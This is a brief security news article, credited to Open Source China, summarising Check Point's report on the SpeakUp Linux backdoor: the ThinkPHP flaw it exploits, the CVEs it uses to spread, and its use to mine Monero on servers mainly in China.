How the 'SpeakUp' Linux Backdoor Hijacks Servers and Mines Monero

A new Linux backdoor named SpeakUp has begun spreading, primarily targeting Linux servers in China.

Discovered three weeks ago by Check Point researchers, SpeakUp exploits the ThinkPHP framework vulnerability CVE‑2018‑20062, allowing attackers to execute arbitrary PHP code, modify local cron jobs for persistence, run shell commands, and download or update files from a remote command‑and‑control server.

The malware includes a built‑in Python script that propagates laterally across the local network, scanning for open ports, brute‑forcing credentials with a predefined list, and compromising unpatched systems using one of several known vulnerabilities:

CVE‑2012‑0874: JBoss Enterprise Application Platform multiple security bypass

CVE‑2010‑1871: JBoss Seam Framework remote code execution

JBoss AS 3/4/5/6: remote command execution

CVE‑2017‑10271: Oracle WebLogic wls‑wsat component deserialization RCE

CVE‑2018‑2894: Oracle Fusion Middleware WebLogic Server component vulnerability

Hadoop YARN ResourceManager – command execution

CVE‑2016‑3088: Apache ActiveMQ file upload remote code execution

Check Point reports that SpeakUp can run on six different Linux distributions and even macOS, and the attackers have been using the backdoor to deploy Monero cryptocurrency miners, already harvesting about 107 Monero (≈ US $4,500).

Infection maps show most victims are in Asia and South America, with China being the primary hotspot.

Researchers note that, so far, the attackers have only leveraged the ThinkPHP CVE‑2018‑20062 exploit, but they could easily switch to other vulnerabilities to broaden SpeakUp’s reach.

Source: Open Source China